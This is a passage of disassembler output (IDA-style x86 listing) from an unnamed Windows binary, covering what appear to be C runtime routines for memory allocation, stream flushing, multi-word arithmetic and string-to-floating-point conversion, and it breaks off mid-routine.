sub_421650 endp
; =============== S U B R O U T I N E =======================================
sub_421681 proc near ; CODE XREF: sub_41FEA9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword ptr byte_445EDC+0D46A8h, ebx
push esi
push edi
jnz short loc_4216D0
push 42DF44h
call dword ptr byte_4240D4+4
mov edi, eax
cmp edi, ebx
jz short loc_421706
mov esi, dword ptr byte_4240D4
push 424C44h
push edi
call esi ; byte_4240D4
test eax, eax
mov dword ptr byte_445EDC+0D46A8h, eax
jz short loc_421706
push 424C34h
push edi
call esi ; byte_4240D4
push 424C20h
push edi
mov dword ptr byte_445EDC+0D46ACh, eax
call esi ; byte_4240D4
mov dword ptr byte_445EDC+0D46B0h, eax
loc_4216D0: ; CODE XREF: sub_421681+B�j
mov eax, dword ptr byte_445EDC+0D46ACh
test eax, eax
jz short loc_4216EF
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4216EF
mov eax, dword ptr byte_445EDC+0D46B0h
test eax, eax
jz short loc_4216EF
push ebx
call eax
mov ebx, eax
loc_4216EF: ; CODE XREF: sub_421681+56�j
; sub_421681+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword ptr byte_445EDC+0D46A8h
loc_421702: ; CODE XREF: sub_421681+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_421706: ; CODE XREF: sub_421681+1C�j
; sub_421681+33�j
xor eax, eax
jmp short loc_421702
sub_421681 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42170A proc near ; CODE XREF: .text:00420088�p
; .text:004200A1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
cmp esi, 0FFFFFFE0h
push edi
mov [ebp+arg_0], esi
ja short loc_42172B
test esi, esi
jnz short loc_421725
push 1
pop esi
loc_421725: ; CODE XREF: sub_42170A+16�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_42172B: ; CODE XREF: sub_42170A+12�j
; sub_42170A+94�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_42178A
mov eax, dword ptr byte_445EDC+0D5A48h
cmp eax, 3
jnz short loc_421756
mov eax, [ebp+arg_0]
cmp eax, dword ptr byte_445EDC+0D5A40h
ja short loc_421775
push eax
call sub_41B3C2
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4217A0
jmp short loc_421775
; ---------------------------------------------------------------------------
loc_421756: ; CODE XREF: sub_42170A+30�j
cmp eax, 2
jnz short loc_421775
cmp esi, dword_43FF74
ja short loc_421775
mov eax, esi
shr eax, 4
push eax
call sub_41BE65
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4217B4
loc_421775: ; CODE XREF: sub_42170A+3B�j
; sub_42170A+4A�j ...
push esi ; dwBytes
push 8 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapAlloc
mov edi, eax
test edi, edi
jnz short loc_4217AE
loc_42178A: ; CODE XREF: sub_42170A+26�j
cmp dword ptr byte_445EDC+0D443Ch, 0
jz short loc_4217AE
push esi
call sub_41AE39
test eax, eax
pop ecx
jz short loc_4217B7
jmp short loc_42172B
; ---------------------------------------------------------------------------
loc_4217A0: ; CODE XREF: sub_42170A+48�j
push [ebp+arg_0]
loc_4217A3: ; CODE XREF: sub_42170A+AB�j
push 0
push edi
call sub_4179E0
add esp, 0Ch
loc_4217AE: ; CODE XREF: sub_42170A+7E�j
; sub_42170A+87�j
mov eax, edi
loc_4217B0: ; CODE XREF: sub_42170A+AF�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4217B4: ; CODE XREF: sub_42170A+69�j
push esi
jmp short loc_4217A3
; ---------------------------------------------------------------------------
loc_4217B7: ; CODE XREF: sub_42170A+92�j
xor eax, eax
jmp short loc_4217B0
sub_42170A endp
; ---------------------------------------------------------------------------
loc_4217BB: ; CODE XREF: .text:00420119�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp dword ptr byte_445EDC+0D56E4h, esi
jle short loc_42180E
loc_4217CA: ; CODE XREF: .text:0042180C�j
mov eax, dword ptr byte_445EDC+0D46DCh
mov eax, [eax+esi*4]
test eax, eax
jz short loc_421805
test byte ptr [eax+0Ch], 83h
jz short loc_4217E9
push eax
call sub_418F0B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4217E9
inc edi
loc_4217E9: ; CODE XREF: .text:004217DA�j
; .text:004217E6�j
cmp esi, 14h
jl short loc_421805
mov eax, dword ptr byte_445EDC+0D46DCh
push dword ptr [eax+esi*4]
call sub_418227
mov eax, dword ptr byte_445EDC+0D46DCh
pop ecx
and dword ptr [eax+esi*4], 0
loc_421805: ; CODE XREF: .text:004217D4�j
; .text:004217EC�j
inc esi
cmp esi, dword ptr byte_445EDC+0D56E4h
jl short loc_4217CA
loc_42180E: ; CODE XREF: .text:004217C8�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_421813 proc near ; CODE XREF: sub_420482+2B�p
; sub_420482+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_421829
cmp ecx, esi
jnb short loc_42182C
loc_421829: ; CODE XREF: sub_421813+10�j
push 1
pop eax
loc_42182C: ; CODE XREF: sub_421813+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_421813 endp
; =============== S U B R O U T I N E =======================================
sub_421834 proc near ; CODE XREF: sub_4218ED+40�p
; sub_4218ED+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_421813
add esp, 0Ch
test eax, eax
jz short loc_421866
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_421813
add esp, 0Ch
test eax, eax
jz short loc_421866
inc dword ptr [esi+8]
loc_421866: ; CODE XREF: sub_421834+19�j
; sub_421834+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_421813
add esp, 0Ch
test eax, eax
jz short loc_42187E
inc dword ptr [esi+8]
loc_42187E: ; CODE XREF: sub_421834+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_421813
add esp, 0Ch
pop edi
pop esi
retn
sub_421834 endp
; =============== S U B R O U T I N E =======================================
sub_421892 proc near ; CODE XREF: sub_4218ED+30�p
; sub_4218ED+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_421892 endp
; =============== S U B R O U T I N E =======================================
sub_4218C0 proc near ; CODE XREF: sub_421E85+1C8�p
; sub_42244D+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_4218C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4218ED proc near ; CODE XREF: sub_4219B4+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_421961
push edi
mov [ebp+arg_8], eax
loc_421914: ; CODE XREF: sub_4218ED+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_421892
push ebx
call sub_421892
lea eax, [ebp+var_10]
push eax
push ebx
call sub_421834
push ebx
call sub_421892
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_421834
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_421914
xor edx, edx
pop edi
loc_421961: ; CODE XREF: sub_4218ED+21�j
; sub_4218ED+9F�j
cmp [ebx+8], edx
jnz short loc_42198E
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_421961
; ---------------------------------------------------------------------------
loc_42198E: ; CODE XREF: sub_4218ED+77�j
mov esi, 8000h
loc_421993: ; CODE XREF: sub_4218ED+B9�j
test [ebx+8], esi
jnz short loc_4219A8
push ebx
call sub_421892
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_421993
; ---------------------------------------------------------------------------
loc_4219A8: ; CODE XREF: sub_4218ED+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_4218ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4219B4 proc near ; CODE XREF: sub_4207CB+17�p
; sub_4207F8+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_4219EF: ; CODE XREF: sub_4219B4+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_421A05
cmp cl, 9
jz short loc_421A05
cmp cl, 0Ah
jz short loc_421A05
cmp cl, 0Dh
jnz short loc_421A08
loc_421A05: ; CODE XREF: sub_4219B4+40�j
; sub_4219B4+45�j ...
inc edi
jmp short loc_4219EF
; ---------------------------------------------------------------------------
loc_421A08: ; CODE XREF: sub_4219B4+4F�j
push 4
pop esi
loc_421A0B: ; CODE XREF: sub_4219B4+AE�j
; sub_4219B4+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_421C8E ; default
; jumptable 00421A17 case 10
jmp off_421E55[eax*4] ; switch jump
loc_421A1E: ; DATA XREF: .text:off_421E55�o
cmp bl, 31h ; jumptable 00421A17 case 0
jl short loc_421A2F
cmp bl, 39h
jg short loc_421A2F
loc_421A28: ; CODE XREF: sub_4219B4+C4�j
; sub_4219B4+118�j
push 3
jmp loc_421C4C
; ---------------------------------------------------------------------------
loc_421A2F: ; CODE XREF: sub_4219B4+6D�j
; sub_4219B4+72�j
cmp bl, byte_43DF40
jnz short loc_421A3E
loc_421A37: ; CODE XREF: sub_4219B4+124�j
push 5
jmp loc_421C84
; ---------------------------------------------------------------------------
loc_421A3E: ; CODE XREF: sub_4219B4+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_421A64
dec eax
dec eax
jz short loc_421A58
sub eax, 3
jnz loc_421D27
jmp loc_421AE7
; ---------------------------------------------------------------------------
loc_421A58: ; CODE XREF: sub_4219B4+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_421A0B
; ---------------------------------------------------------------------------
loc_421A64: ; CODE XREF: sub_4219B4+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_421A0B
; ---------------------------------------------------------------------------
loc_421A6D: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
cmp bl, 31h ; jumptable 00421A17 case 1
mov [ebp+var_10], edx
jl short loc_421A7A
cmp bl, 39h
jle short loc_421A28
loc_421A7A: ; CODE XREF: sub_4219B4+BF�j
cmp bl, byte_43DF40
jz loc_421B42
cmp bl, 2Bh
jz short loc_421ABC
cmp bl, 2Dh
jz short loc_421ABC
cmp bl, 30h
jz short loc_421AE7
loc_421A95: ; CODE XREF: sub_4219B4+207�j
cmp bl, 43h
jle loc_421D27
cmp bl, 45h
jle short loc_421AB5
cmp bl, 63h
jle loc_421D27
cmp bl, 65h
jg loc_421D27
loc_421AB5: ; CODE XREF: sub_4219B4+ED�j
push 6
jmp loc_421C84
; ---------------------------------------------------------------------------
loc_421ABC: ; CODE XREF: sub_4219B4+D5�j
; sub_4219B4+DA�j ...
dec edi
push 0Bh
jmp loc_421C84
; ---------------------------------------------------------------------------
loc_421AC4: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
cmp bl, 31h ; jumptable 00421A17 case 2
jl short loc_421AD2
cmp bl, 39h
jle loc_421A28
loc_421AD2: ; CODE XREF: sub_4219B4+113�j
cmp bl, byte_43DF40
jz loc_421A37
cmp bl, 30h
jnz loc_421C9C
loc_421AE7: ; CODE XREF: sub_4219B4+9F�j
; sub_4219B4+DF�j
mov eax, edx
jmp loc_421A0B
; ---------------------------------------------------------------------------
loc_421AEE: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
mov [ebp+var_10], edx ; jumptable 00421A17 case 3
loc_421AF1: ; CODE XREF: sub_4219B4+184�j
cmp cbMultiByte, edx
jle short loc_421B0A
movzx eax, bl
push esi ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
push 1
pop edx
jmp short loc_421B18
; ---------------------------------------------------------------------------
loc_421B0A: ; CODE XREF: sub_4219B4+143�j
mov ecx, dword_43DD30
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_421B18: ; CODE XREF: sub_4219B4+154�j
test eax, eax
jz short loc_421B3A
cmp [ebp+var_4], 19h
jnb short loc_421B32
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_421B35
; ---------------------------------------------------------------------------
loc_421B32: ; CODE XREF: sub_4219B4+16C�j
inc [ebp+var_8]
loc_421B35: ; CODE XREF: sub_4219B4+17C�j
mov bl, [edi]
inc edi
jmp short loc_421AF1
; ---------------------------------------------------------------------------
loc_421B3A: ; CODE XREF: sub_4219B4+166�j
cmp bl, byte_43DF40
jnz short loc_421BA9
loc_421B42: ; CODE XREF: sub_4219B4+CC�j
mov eax, esi
jmp loc_421A0B
; ---------------------------------------------------------------------------
loc_421B49: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
cmp [ebp+var_4], 0 ; jumptable 00421A17 case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_421B62
loc_421B55: ; CODE XREF: sub_4219B4+1AC�j
cmp bl, 30h
jnz short loc_421B62
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_421B55
; ---------------------------------------------------------------------------
loc_421B62: ; CODE XREF: sub_4219B4+19F�j
; sub_4219B4+1A4�j ...
cmp cbMultiByte, edx
jle short loc_421B7B
movzx eax, bl
push esi ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
push 1
pop edx
jmp short loc_421B89
; ---------------------------------------------------------------------------
loc_421B7B: ; CODE XREF: sub_4219B4+1B4�j
mov ecx, dword_43DD30
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_421B89: ; CODE XREF: sub_4219B4+1C5�j
test eax, eax
jz short loc_421BA9
cmp [ebp+var_4], 19h
jnb short loc_421BA4
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_421BA4: ; CODE XREF: sub_4219B4+1DD�j
mov bl, [edi]
inc edi
jmp short loc_421B62
; ---------------------------------------------------------------------------
loc_421BA9: ; CODE XREF: sub_4219B4+18C�j
; sub_4219B4+1D7�j
cmp bl, 2Bh
jz loc_421ABC
cmp bl, 2Dh
jz loc_421ABC
jmp loc_421A95
; ---------------------------------------------------------------------------
loc_421BC0: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
cmp cbMultiByte, edx ; jumptable 00421A17 case 5
mov [ebp+var_24], edx
jle short loc_421BDC
movzx eax, bl
push esi ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
push 1
pop edx
jmp short loc_421BEA
; ---------------------------------------------------------------------------
loc_421BDC: ; CODE XREF: sub_4219B4+215�j
mov ecx, dword_43DD30
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_421BEA: ; CODE XREF: sub_4219B4+226�j
test eax, eax
jz loc_421C9C
mov eax, esi
jmp short loc_421C4D
; ---------------------------------------------------------------------------
loc_421BF6: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
lea ecx, [edi-2] ; jumptable 00421A17 case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_421C06
cmp bl, 39h
jle short loc_421C4A
loc_421C06: ; CODE XREF: sub_4219B4+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_421C82
dec eax
dec eax
jz short loc_421C76
sub eax, 3
jnz loc_421D2A
loc_421C1B: ; CODE XREF: sub_4219B4+2A4�j
push 8
jmp short loc_421C84
; ---------------------------------------------------------------------------
loc_421C1F: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
mov [ebp+var_20], edx ; jumptable 00421A17 case 8
loc_421C22: ; CODE XREF: sub_4219B4+276�j
cmp bl, 30h
jnz short loc_421C2C
mov bl, [edi]
inc edi
jmp short loc_421C22
; ---------------------------------------------------------------------------
loc_421C2C: ; CODE XREF: sub_4219B4+271�j
cmp bl, 31h
jl loc_421D27
cmp bl, 39h
jg loc_421D27
jmp short loc_421C4A
; ---------------------------------------------------------------------------
loc_421C40: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
cmp bl, 31h ; jumptable 00421A17 case 7
jl short loc_421C53
cmp bl, 39h
jg short loc_421C53
loc_421C4A: ; CODE XREF: sub_4219B4+250�j
; sub_4219B4+28A�j
push 9
loc_421C4C: ; CODE XREF: sub_4219B4+76�j
pop eax
loc_421C4D: ; CODE XREF: sub_4219B4+240�j
dec edi
jmp loc_421A0B
; ---------------------------------------------------------------------------
loc_421C53: ; CODE XREF: sub_4219B4+28F�j
; sub_4219B4+294�j
cmp bl, 30h
jnz short loc_421C9C
jmp short loc_421C1B
; ---------------------------------------------------------------------------
loc_421C5A: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
cmp [ebp+arg_18], 0 ; jumptable 00421A17 case 11
jz short loc_421C8A
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_421C82
dec eax
dec eax
jnz loc_421D2A
loc_421C76: ; CODE XREF: sub_4219B4+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_421A0B
; ---------------------------------------------------------------------------
loc_421C82: ; CODE XREF: sub_4219B4+258�j
; sub_4219B4+2B8�j
push 7
loc_421C84: ; CODE XREF: sub_4219B4+85�j
; sub_4219B4+103�j ...
pop eax
jmp loc_421A0B
; ---------------------------------------------------------------------------
loc_421C8A: ; CODE XREF: sub_4219B4+2AA�j
push 0Ah
dec edi
pop eax
loc_421C8E: ; CODE XREF: sub_4219B4+5D�j
; sub_4219B4+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 00421A17 case 10
jz loc_421D2C
jmp loc_421A0B
; ---------------------------------------------------------------------------
loc_421C9C: ; CODE XREF: sub_4219B4+12D�j
; sub_4219B4+238�j ...
mov edi, [ebp+arg_8]
jmp loc_421D2C
; ---------------------------------------------------------------------------
loc_421CA4: ; CODE XREF: sub_4219B4+63�j
; DATA XREF: .text:off_421E55�o
mov [ebp+var_20], 1 ; jumptable 00421A17 case 9
xor esi, esi
loc_421CAD: ; CODE XREF: sub_4219B4+339�j
cmp cbMultiByte, 1
jle short loc_421CC5
movzx eax, bl
push 4 ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_421CD4
; ---------------------------------------------------------------------------
loc_421CC5: ; CODE XREF: sub_4219B4+300�j
mov ecx, dword_43DD30
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_421CD4: ; CODE XREF: sub_4219B4+30F�j
test eax, eax
jz short loc_421CF4
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_421CEF
mov bl, [edi]
inc edi
jmp short loc_421CAD
; ---------------------------------------------------------------------------
loc_421CEF: ; CODE XREF: sub_4219B4+334�j
mov esi, 1451h
loc_421CF4: ; CODE XREF: sub_4219B4+322�j
mov [ebp+var_1C], esi
loc_421CF7: ; CODE XREF: sub_4219B4+371�j
cmp cbMultiByte, 1
jle short loc_421D0F
movzx eax, bl
push 4 ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_421D1E
; ---------------------------------------------------------------------------
loc_421D0F: ; CODE XREF: sub_4219B4+34A�j
mov ecx, dword_43DD30
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_421D1E: ; CODE XREF: sub_4219B4+359�j
test eax, eax
jz short loc_421D27
mov bl, [edi]
inc edi
jmp short loc_421CF7
; ---------------------------------------------------------------------------
loc_421D27: ; CODE XREF: sub_4219B4+99�j
; sub_4219B4+E4�j ...
dec edi
jmp short loc_421D2C
; ---------------------------------------------------------------------------
loc_421D2A: ; CODE XREF: sub_4219B4+261�j
; sub_4219B4+2BC�j
mov edi, ecx
loc_421D2C: ; CODE XREF: sub_4219B4+2DD�j
; sub_4219B4+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_421E14
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_421D58
cmp [ebp+var_45], 5
jl short loc_421D4C
inc [ebp+var_45]
loc_421D4C: ; CODE XREF: sub_4219B4+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_421D5B
; ---------------------------------------------------------------------------
loc_421D58: ; CODE XREF: sub_4219B4+38D�j
mov eax, [ebp+var_C]
loc_421D5B: ; CODE XREF: sub_4219B4+3A2�j
cmp [ebp+var_4], 0
jbe loc_421E0A
loc_421D65: ; CODE XREF: sub_4219B4+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_421D73
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_421D65
; ---------------------------------------------------------------------------
loc_421D73: ; CODE XREF: sub_4219B4+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_4218ED
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_421D92
neg eax
loc_421D92: ; CODE XREF: sub_4219B4+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_421D9D
add eax, [ebp+arg_10]
loc_421D9D: ; CODE XREF: sub_4219B4+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_421DA5
sub eax, [ebp+arg_14]
loc_421DA5: ; CODE XREF: sub_4219B4+3EC�j
cmp eax, 1450h
jle short loc_421DDC
mov [ebp+var_2C], 1
loc_421DB3: ; CODE XREF: sub_4219B4+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_421DBF: ; CODE XREF: sub_4219B4+454�j
; sub_4219B4+45E�j
cmp [ebp+var_2C], 0
jz short loc_421E25
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_421E3A
; ---------------------------------------------------------------------------
loc_421DDC: ; CODE XREF: sub_4219B4+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_421DEC
mov [ebp+var_30], 1
jmp short loc_421DB3
; ---------------------------------------------------------------------------
loc_421DEC: ; CODE XREF: sub_4219B4+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_42266D
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_421DBF
; ---------------------------------------------------------------------------
loc_421E0A: ; CODE XREF: sub_4219B4+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_421DBF
; ---------------------------------------------------------------------------
loc_421E14: ; CODE XREF: sub_4219B4+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_421E3A
; ---------------------------------------------------------------------------
loc_421E25: ; CODE XREF: sub_4219B4+40F�j
cmp [ebp+var_30], 0
jz short loc_421E3A
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_421E3A: ; CODE XREF: sub_4219B4+426�j
; sub_4219B4+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_4219B4 endp
; ---------------------------------------------------------------------------
off_421E55 dd offset loc_421A1E ; DATA XREF: sub_4219B4+63�r
dd offset loc_421A6D ; jump table for switch statement
dd offset loc_421AC4
dd offset loc_421AEE
dd offset loc_421B49
dd offset loc_421BC0
dd offset loc_421BF6
dd offset loc_421C40
dd offset loc_421C1F
dd offset loc_421CA4
dd offset loc_421C8E
dd offset loc_421C5A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421E85 proc near ; CODE XREF: sub_42089C+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_421EE7
mov byte ptr [ebx+2], 2Dh
jmp short loc_421EEB
; ---------------------------------------------------------------------------
loc_421EE7: ; CODE XREF: sub_421E85+5A�j
mov byte ptr [ebx+2], 20h
loc_421EEB: ; CODE XREF: sub_421E85+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_421F11
test edi, edi
jnz short loc_421F11
cmp [ebp+arg_0], edi
jnz short loc_421F11
loc_421EFC: ; CODE XREF: sub_421E85+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_42210F
; ---------------------------------------------------------------------------
loc_421F11: ; CODE XREF: sub_421E85+6C�j
; sub_421E85+70�j ...
cmp dx, si
jnz short loc_421F90
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_421F2A
cmp [ebp+arg_0], 0
jz short loc_421F39
loc_421F2A: ; CODE XREF: sub_421E85+9D�j
